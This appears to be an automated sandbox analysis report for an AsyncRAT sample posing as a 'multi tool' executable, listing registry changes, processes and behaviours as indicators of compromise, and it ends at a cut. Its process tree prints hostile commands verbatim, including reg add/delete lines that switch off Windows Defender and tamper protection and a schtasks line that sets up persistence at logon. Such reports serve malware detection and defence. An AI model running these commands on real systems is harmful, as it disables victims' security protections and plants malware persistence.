asyncrat | 651c36f0da68009168c0eda7cb0c33eac27d2c57840cabb2604db862d291c671

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\testgovna.exe"	WindowsDefender.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 16 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\IOAVMaxSize = "512"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	WindowsSecruity.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride = "1"	WindowsSecruity.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 38 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1068	powershell.exe
1864	powershell.exe
3744	powershell.exe
328	powershell.exe
3420	powershell.exe
5496	powershell.exe
6896	powershell.exe
6940	powershell.exe
5320	powershell.exe
5148	powershell.exe
4284	powershell.exe
4840	powershell.exe
6036	powershell.exe
5912	powershell.exe
696	powershell.exe
5416	powershell.exe
2092	powershell.exe
3040	powershell.exe
5784	powershell.exe
4076	powershell.exe
3112	powershell.exe
6516	powershell.exe
2436	powershell.exe
6300	powershell.exe
5772	powershell.exe
5684	powershell.exe
5012	powershell.exe
6484	powershell.exe
6580	powershell.exe
7036	powershell.exe
4864	powershell.exe
444	powershell.exe
3696	powershell.exe
5568	powershell.exe
5508	powershell.exe
2508	powershell.exe
5556	powershell.exe
3344	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
6296	netsh.exe

Possible privilege escalation attempt 3 IoCs

exploit

pid	Process
5808	icacls.exe
5368	takeown.exe
5392	icacls.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	WindowsSecruity.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation	void multi tool (REMADE).exe

Executes dropped EXE 2 IoCs

pid	Process
724	WindowsDefender.exe
3440	WindowsSecruity.exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5808	icacls.exe
5368	takeown.exe
5392	icacls.exe

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride = "1"	WindowsSecruity.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\FirstRunDisabled = "1"	WindowsSecruity.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\seceruity = "C:\\Users\\Admin\\AppData\\Roaming\\xdwdUnreal Engine.exe"	WindowsDefender.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
165	discord.com
90	discord.com
91	discord.com

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

persistence privilege_escalation

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\1cf5ca12-d989-4eb0-827a-c367b3192500.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241207085703.pma	setup.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	void multi tool (REMADE).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5668	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133780353664232036"	chrome.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3785588363-1079601362-4184885025-1000\{CF0AEB7D-79C5-4954-9D8E-6264DB0ABACD}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3785588363-1079601362-4184885025-1000\{1551C3B6-961D-468D-B7E7-2C3A049ED075}	msedge.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe

Modifies registry key 1 TTPs 24 IoCs

Modify Registry

pid	Process
1420	reg.exe
5812	reg.exe
6120	reg.exe
3948	reg.exe
4176	reg.exe
648	reg.exe
2380	reg.exe
3264	reg.exe
5420	reg.exe
5888	reg.exe
5972	reg.exe
3752	reg.exe
4656	reg.exe
5944	reg.exe
1316	reg.exe
4596	reg.exe
5820	reg.exe
3040	reg.exe
456	reg.exe
1224	reg.exe
704	reg.exe
5848	reg.exe
1056	reg.exe
4288	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4168	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe
724	WindowsDefender.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3440	WindowsSecruity.exe
724	WindowsDefender.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
4588	msedge.exe
4588	msedge.exe
4588	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	724	WindowsDefender.exe
Token: SeDebugPrivilege	3440	WindowsSecruity.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeShutdownPrivilege	1528	chrome.exe
Token: SeCreatePagefilePrivilege	1528	chrome.exe
Token: SeDebugPrivilege	2304	taskmgr.exe
Token: SeSystemProfilePrivilege	2304	taskmgr.exe
Token: SeCreateGlobalPrivilege	2304	taskmgr.exe
Token: SeDebugPrivilege	5160	taskmgr.exe
Token: SeSystemProfilePrivilege	5160	taskmgr.exe
Token: SeCreateGlobalPrivilege	5160	taskmgr.exe
Token: 33	5824	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5824	AUDIODG.EXE
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	5644	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	5272	powershell.exe
Token: SeDebugPrivilege	5372	powershell.exe
Token: SeDebugPrivilege	5748	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	5124	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	696	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	5556	powershell.exe
Token: SeDebugPrivilege	5528	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	5660	powershell.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	5416	powershell.exe
Token: SeDebugPrivilege	5772	powershell.exe
Token: SeDebugPrivilege	5148	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeDebugPrivilege	5784	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	6036	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	5684	powershell.exe

Suspicious use of FindShellTrayWindow 60 IoCs

pid	Process
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5324	msedge.exe
5324	msedge.exe
5324	msedge.exe
4588	msedge.exe
4588	msedge.exe

Suspicious use of SendNotifyMessage 52 IoCs

pid	Process
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
1528	chrome.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
2304	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe
5160	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4252 wrote to memory of 724	4252	void multi tool (REMADE).exe	81
PID 4252 wrote to memory of 724	4252	void multi tool (REMADE).exe	81
PID 4252 wrote to memory of 3440	4252	void multi tool (REMADE).exe	82
PID 4252 wrote to memory of 3440	4252	void multi tool (REMADE).exe	82
PID 4252 wrote to memory of 4932	4252	void multi tool (REMADE).exe	83
PID 4252 wrote to memory of 4932	4252	void multi tool (REMADE).exe	83
PID 4252 wrote to memory of 4932	4252	void multi tool (REMADE).exe	83
PID 4932 wrote to memory of 2684	4932	cmd.exe	86
PID 4932 wrote to memory of 2684	4932	cmd.exe	86
PID 4932 wrote to memory of 2684	4932	cmd.exe	86
PID 724 wrote to memory of 5088	724	WindowsDefender.exe	94
PID 724 wrote to memory of 5088	724	WindowsDefender.exe	94
PID 5088 wrote to memory of 4168	5088	CMD.exe	96
PID 5088 wrote to memory of 4168	5088	CMD.exe	96
PID 1528 wrote to memory of 3208	1528	chrome.exe	104
PID 1528 wrote to memory of 3208	1528	chrome.exe	104
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3800	1528	chrome.exe	106
PID 1528 wrote to memory of 3260	1528	chrome.exe	107
PID 1528 wrote to memory of 3260	1528	chrome.exe	107
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108
PID 1528 wrote to memory of 4864	1528	chrome.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\void multi tool (REMADE).exe
"C:\Users\Admin\AppData\Local\Temp\void multi tool (REMADE).exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4252
- C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
  "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:724
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Windows" /tr "C:\Users\Admin\AppData\Roaming\testgovna.exe" & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5088
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Windows" /tr "C:\Users\Admin\AppData\Roaming\testgovna.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4168
- C:\Users\Admin\AppData\Local\Temp\WindowsSecruity.exe
  "C:\Users\Admin\AppData\Local\Temp\WindowsSecruity.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Windows security bypass
  - Checks computer location settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:3440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:848
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" delete HKLM\Software\Policies\Microsoft\Windows Defender /f
      4⤵
      Modifies registry key
      PID:2380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5644
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:5848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:876
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiVirus /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:3264
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
